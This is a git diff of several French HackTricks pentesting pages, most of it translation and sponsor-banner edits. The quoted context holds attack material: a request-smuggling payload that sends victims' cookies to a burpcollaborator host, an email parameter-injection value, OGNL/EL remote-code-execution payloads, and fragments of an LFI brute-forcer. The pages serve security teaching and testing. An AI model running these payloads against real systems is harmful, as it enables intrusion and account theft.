<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks:
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -50,7 +50,7 @@ chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
Heureusement, PHP est actuellement souvent déployé via PHP-FPM et Nginx. Nginx offre une fonctionnalité [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) facilement négligée qui écrira des fichiers temporaires si le corps du client (pas limité à post) est plus grand qu'un certain seuil.
Heureusement, PHP est actuellement souvent déployé via PHP-FPM et Nginx. Nginx offre une fonctionnalité de [mise en mémoire tampon du corps du client](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) facilement négligée, qui écrira des fichiers temporaires si le corps du client (pas limité aux post) est plus grand qu'un certain seuil.
Cette fonctionnalité permet aux LFIs d'être exploités sans aucun autre moyen de créer des fichiers, si Nginx s'exécute en tant que même utilisateur que PHP (très couramment fait en tant que www-data).
@ -157,21 +157,21 @@ for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
```
```html
<h2>Local File Inclusion to Remote Code Execution via Nginx Temporary Files</h2>
```plaintext
# LFI to RCE via Nginx temp files
<p>In some cases, Nginx can be misconfigured to store temporary files in a directory that is writable by the web server user. This misconfiguration can be exploited to achieve remote code execution by including a malicious file in a request and then executing it.</p>
When a file is uploaded to a server running Nginx, temporary files are created in the `/var/tmp/nginx` directory. If the server is misconfigured and allows file inclusion, an attacker can potentially exploit this to achieve remote code execution (RCE).
<h3>Exploitation Steps:</h3>
## Exploitation
<ol>
<li>Identify the location where Nginx stores temporary files.</li>
<li>Create a malicious PHP file with your desired payload.</li>
<li>Include the malicious file in a request to the target web application.</li>
<li>Execute the included file by visiting the corresponding URL.</li>
</ol>
1. Upload a file containing malicious PHP code.
2. Intercept the request and rename the temporary file to end with `.php`.
3. Include the file using LFI.
4. Execute the PHP code remotely.
<p>By leveraging this misconfiguration, an attacker can execute arbitrary code on the server and potentially take full control of the system.</p>
## Prevention
To prevent this attack, ensure that the server is properly configured to disallow file inclusion from the Nginx temporary directory. Additionally, validate and sanitize all file uploads to prevent malicious files from being uploaded.
```
```
$ ./pwn.py 127.0.0.1 1337
@ -307,9 +307,9 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -325,9 +325,9 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -6,19 +6,19 @@
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -64,8 +64,8 @@ Si le **joker** est utilisé, les **messages pourraient être envoyés à n'impo
### Attaquer l'iframe & le joker dans **targetOrigin**
Comme expliqué dans [**ce rapport**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) si vous trouvez une page qui peut être **iframée** (pas de protection `X-Frame-Header`) et qui envoie un message **sensible** via **postMessage** en utilisant un **joker** (\*), vous pouvez **modifier** l'**origine** de l'**iframe** et **exposer** le **message sensible** à un domaine contrôlé par vous.\
Notez que si la page peut être iframée mais que le **targetOrigin** est **défini sur une URL et non sur un joker**, ce **truc ne fonctionnera pas**.
Comme expliqué dans [**ce rapport**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) si vous trouvez une page qui peut être **iframée** (pas de protection `X-Frame-Header`) et qui envoie des messages **sensibles** via **postMessage** en utilisant un **joker** (\*), vous pouvez **modifier** l'**origine** de l'**iframe** et **exposer** le **message sensible** à un domaine contrôlé par vous.\
Notez que si la page peut être iframée mais que le **targetOrigin** est **défini sur une URL et non sur un joker**, ce **tour ne fonctionnera pas**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -92,7 +92,7 @@ return;
// ...
}, false);
```
Notez dans ce cas comment la **première chose** que le code fait est de **vérifier l'origine**. C'est terriblement **important** surtout si la page va faire **quelque chose de sensible** avec les informations reçues (comme changer un mot de passe). **Si elle ne vérifie pas l'origine, les attaquants peuvent faire en sorte que les victimes envoient des données arbitraires à ces points d'extrémité** et changer les mots de passe des victimes (dans cet exemple).
Notez dans ce cas comment la **première chose** que le code fait est de **vérifier l'origine**. C'est terriblement **important** surtout si la page va faire **quelque chose de sensible** avec les informations reçues (comme changer un mot de passe). **Si elle ne vérifie pas l'origine, les attaquants peuvent faire en sorte que les victimes envoient des données arbitraires à ces points de terminaison** et changer les mots de passe des victimes (dans cet exemple).
### Énumération
@ -149,7 +149,7 @@ Lors de l'intégration d'une page web dans un **iframe sandboxé** en utilisant
En spécifiant **`allow-popups`** dans l'attribut sandbox, toute fenêtre contextuelle ouverte depuis l'iframe hérite des restrictions de sandbox de son parent. Cela signifie que sauf si l'attribut **`allow-popups-to-escape-sandbox`** est également inclus, l'origine de la fenêtre contextuelle est également définie sur `null`, correspondant à l'origine de l'iframe.
Par conséquent, lorsqu'une fenêtre contextuelle est ouverte dans ces conditions et qu'un message est envoyé de l'iframe à la fenêtre contextuelle en utilisant **`postMessage`**, les origines de l'envoi et de la réception sont définies sur `null`. Cette situation conduit à un scénario où **`e.origin == window.origin`** est évalué à true (`null == null`), car l'iframe et la fenêtre contextuelle partagent la même valeur d'origine `null`.
Par conséquent, lorsqu'une fenêtre contextuelle est ouverte dans ces conditions et qu'un message est envoyé de l'iframe à la fenêtre contextuelle en utilisant **`postMessage`**, les origines d'envoi et de réception sont définies sur `null`. Cette situation conduit à un scénario où **`e.origin == window.origin`** est évalué à vrai (`null == null`), car l'iframe et la fenêtre contextuelle partagent la même valeur d'origine `null`.
Pour plus d'informations, **lisez** :
@ -194,7 +194,7 @@ Sur la page suivante, vous pouvez voir comment vous pourriez voler des données
### Vol de message en modifiant l'emplacement de l'iframe
Si vous pouvez intégrer une page web sans en-tête X-Frame-Options qui contient un autre iframe, vous pouvez **modifier l'emplacement de cet iframe enfant**, donc s'il reçoit un **message postmessage** envoyé en utilisant un **joker**, un attaquant pourrait **modifier** l'**origine** de cet iframe vers une page **contrôlée** par lui et **voler** le message :
Si vous pouvez intégrer une page web sans en-tête X-Frame contenant un autre iframe, vous pouvez **modifier l'emplacement de cet iframe enfant**, ainsi s'il reçoit un **message postmessage** envoyé avec un **joker**, un attaquant pourrait **modifier** l'**origine** de cet iframe vers une page **contrôlée** par lui et **voler** le message :
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -226,7 +226,7 @@ Pour **plus d'informations** :
* Lien vers la page sur la [**pollution de prototype**](../deserialization/nodejs-proto-prototype-pollution/)
* Lien vers la page sur le [**XSS**](../xss-cross-site-scripting/)
* Lien vers la page sur [**la pollution de prototype côté client vers XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
* Lien vers la page sur la [**pollution de prototype côté client vers XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
## Références
@ -234,9 +234,9 @@ Pour **plus d'informations** :
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* Pour pratiquer : [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -10,13 +10,13 @@ Autres façons de soutenir HackTricks :
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts github.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -49,7 +49,7 @@ Vérifiez si vous pouvez déterminer si un nom d'utilisateur a déjà été enre
### Politique de Mot de Passe
En créant un utilisateur, vérifiez la politique de mot de passe (vérifiez si vous pouvez utiliser des mots de passe faibles).\
Dans ce cas, vous pouvez essayer de forcer les informations d'identification.
Dans ce cas, vous pouvez essayer de bruteforcer les identifiants.
### Injection SQL
@ -74,19 +74,19 @@ Une fois inscrit, essayez de changer l'e-mail et vérifiez si ce changement est
### Autres Vérifications
* Vérifiez si vous pouvez utiliser des **e-mails jetables**
* Mot de passe **long** (>200) entraîne un **DoS**
* Un **mot de passe long** (>200) entraîne un **DoS**
* **Vérifiez les limites de taux sur la création de compte**
* Utilisez username@**burp\_collab**.net et analysez le **rappel**
## **Prise de Contrôle de Réinitialisation de Mot de Passe**
### Fuite de Jeton de Réinitialisation de Mot de Passe Via Référent <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
### Fuite de Jeton de Réinitialisation de Mot de Passe Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Demandez la réinitialisation du mot de passe à votre adresse e-mail
2. Cliquez sur le lien de réinitialisation du mot de passe
3. Ne changez pas le mot de passe
4. Cliquez sur n'importe quel site tiers (par exemple : Facebook, Twitter)
5. Interceptez la demande dans le proxy Burp Suite
5. Interceptez la requête dans le proxy Burp Suite
6. Vérifiez si l'en-tête referer fuit le jeton de réinitialisation du mot de passe.
### Empoisonnement de Réinitialisation de Mot de Passe <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
@ -119,7 +119,7 @@ email=victim@mail.com|hacker@mail.com
1. L'attaquant doit se connecter avec son compte et accéder à la fonctionnalité **Changer de mot de passe**.
2. Démarrer Burp Suite et intercepter la requête.
3. Envoyez-la à l'onglet repeater et modifiez les paramètres : ID utilisateur/email\
`powershell POST /api/changepass [...] ("form": {"email":"victime@email.com","password":"motdepasse"})`
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### Jeton de réinitialisation de mot de passe faible <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
@ -141,7 +141,7 @@ Essayez de déterminer si le jeton expire ou s'il est toujours le même, dans ce
1. Déclenchez une demande de réinitialisation de mot de passe en utilisant l'API/UI pour un e-mail spécifique par exemple : test@mail.com
2. Inspectez la réponse du serveur et recherchez `resetToken`
3. Ensuite, utilisez le jeton dans une URL comme `https://exemple.com/v3/user/password/reset?resetToken=[LE_JETON_DE_REINITIALISATION]&email=[L_EMAIL]`
3. Ensuite, utilisez le jeton dans une URL comme `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Réinitialisation de mot de passe via collision de nom d'utilisateur <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
@ -159,12 +159,12 @@ Voir : [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
2. Fuite du **cookie de session** actuel
3. Authentifiez-vous en tant qu'utilisateur en utilisant le cookie
### Prise de contrôle de compte via Smuggling de requête HTTP <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
### Prise de contrôle de compte via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1. Utilisez **smuggler** pour détecter le type de Smuggling de requête HTTP (CL, TE, CL.TE)\
1. Utilisez **smuggler** pour détecter le type de HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. Créez une requête qui écrasera le `POST / HTTP/1.1` avec les données suivantes :\
`GET http://quelquechose.burpcollaborator.net HTTP/1.1 X:` dans le but de rediriger les victimes vers burpcollab et de voler leurs cookies\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` dans le but de rediriger les victimes vers burpcollab et de voler leurs cookies\
3. La requête finale pourrait ressembler à ce qui suit
```
GET / HTTP/1.1
@ -177,12 +177,12 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
### Prise de contrôle de compte via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
### Comptes compromis via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. Créer une charge utile pour le CSRF, par exemple : "Formulaire HTML avec soumission automatique pour un changement de mot de passe"
2. Envoyer la charge utile
### Prise de contrôle de compte via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
### Comptes compromis via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
Le jeton JSON Web peut être utilisé pour authentifier un utilisateur.
@ -198,9 +198,9 @@ Le jeton JSON Web peut être utilisé pour authentifier un utilisateur.
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -4,17 +4,17 @@
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
* Travaillez-vous dans une **entreprise de cybersécurité**? Vous voulez voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord**](https://discord.gg/hRep4RUj7f) ou le **groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PRs au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -30,14 +30,14 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Le langage d'expression (EL) est essentiel en JavaEE pour relier la couche de présentation (par exemple, les pages web) et la logique de l'application (par exemple, les beans gérés), permettant leur interaction. Il est principalement utilisé dans :
- **JavaServer Faces (JSF)** : Pour lier les composants UI aux données/actions en backend.
- **JavaServer Faces (JSF)** : Pour lier les composants UI aux données/actions côté serveur.
- **JavaServer Pages (JSP)** : Pour l'accès aux données et la manipulation dans les pages JSP.
- **Injection de contextes et de dépendances pour Java EE (CDI)** : Pour faciliter l'interaction de la couche web avec les beans gérés.
- **Contexts and Dependency Injection for Java EE (CDI)** : Pour faciliter l'interaction de la couche web avec les beans gérés.
**Contextes d'utilisation** :
- **Spring Framework** : Appliqué dans divers modules comme la sécurité et les données.
- **Utilisation générale** : À travers l'API SpEL par les développeurs dans les langages basés sur la JVM comme Java, Kotlin et Scala.
- **Usage général** : À travers l'API SpEL par les développeurs dans les langages basés sur la JVM comme Java, Kotlin et Scala.
EL est présent dans les technologies JavaEE, les environnements autonomes, et reconnaissable à travers les extensions de fichiers `.jsp` ou `.jsf`, les erreurs de pile, et des termes comme "Servlet" dans les en-têtes. Cependant, ses fonctionnalités et l'utilisation de certains caractères peuvent dépendre de la version.
@ -147,7 +147,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
```
### RCE
* Explication de base de la RCE
* Explication de base de RCE
```bash
#Check the method getRuntime is there
{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
@ -240,9 +240,9 @@ Consultez [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](http
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -28,13 +28,13 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
---
**Il s'agit d'un résumé de :** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Jetez un œil pour plus de détails (images prises de là).
**Il s'agit d'un résumé de :** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Consultez-le pour plus de détails (images prises à partir de là).
## Compréhension de l'Unicode et de la Normalisation
La normalisation Unicode est un processus qui garantit que les différentes représentations binaires des caractères sont standardisées à la même valeur binaire. Ce processus est crucial pour traiter les chaînes de caractères en programmation et en traitement des données. La norme Unicode définit deux types d'équivalence de caractères :
1. **Équivalence canonique** : Les caractères sont considérés comme équivalents canoniquement s'ils ont la même apparence et la même signification lorsqu'ils sont imprimés ou affichés.
1. **Équivalence canonique** : Les caractères sont considérés comme équivalents canoniquement s'ils ont la même apparence et le même sens lorsqu'ils sont imprimés ou affichés.
2. **Équivalence de compatibilité** : Une forme plus faible d'équivalence où les caractères peuvent représenter le même caractère abstrait mais peuvent être affichés différemment.
Il existe **quatre algorithmes de normalisation Unicode** : NFC, NFD, NFKC et NFKD. Chaque algorithme utilise différemment les techniques de normalisation canonique et de compatibilité. Pour une compréhension plus approfondie, vous pouvez explorer ces techniques sur [Unicode.org](https://unicode.org/).
@ -51,7 +51,7 @@ Comprendre l'encodage Unicode est essentiel, notamment lorsqu'il s'agit de probl
Il est crucial de comprendre ces concepts pour gérer efficacement et atténuer les problèmes potentiels découlant de la complexité de l'Unicode et de ses différentes méthodes d'encodage.
Un exemple de la manière dont l'Unicode normalise deux octets différents représentant le même caractère :
Un exemple de la manière dont Unicode normalise deux octets différents représentant le même caractère :
```python
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
```
@ -105,17 +105,17 @@ Ensuite, un utilisateur malveillant pourrait insérer un caractère Unicode diff
### XSS (Cross Site Scripting)
Vous pourriez utiliser l'un des caractères suivants pour piéger l'application web et exploiter une XSS :
Vous pourriez utiliser l'un des caractères suivants pour tromper l'application web et exploiter une XSS :
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
Remarquez que par exemple le premier caractère Unicode proposé peut être envoyé comme : `%e2%89%ae` ou comme `%u226e`
Notez que par exemple le premier caractère Unicode proposé peut être envoyé comme : `%e2%89%ae` ou comme `%u226e`
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### Fuzzing des Regex
Lorsque le backend **vérifie l'entrée utilisateur avec une regex**, il est possible que l'**entrée** soit **normalisée** pour la **regex** mais **pas** pour l'endroit où elle est **utilisée**. Par exemple, dans une redirection ou SSRF ouverte, la regex pourrait **normaliser l'URL envoyée** mais ensuite **y accéder tel quel**.
Lorsque le backend **vérifie l'entrée utilisateur avec une regex**, il est possible que l'**entrée** soit **normalisée** pour la **regex** mais **pas** pour là où elle est **utilisée**. Par exemple, dans une redirection ou SSRF ouverte, la regex pourrait **normaliser l'URL envoyée** mais ensuite **y accéder tel quel**.
L'outil [**recollapse**](https://github.com/0xacb/recollapse) permet de **générer des variations de l'entrée** pour fuzz le backend. Pour plus d'informations, consultez le **github** et ce [**post**](https://0xacb.com/2022/11/21/recollapse/).
@ -125,9 +125,9 @@ L'outil [**recollapse**](https://github.com/0xacb/recollapse) permet de **géné
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
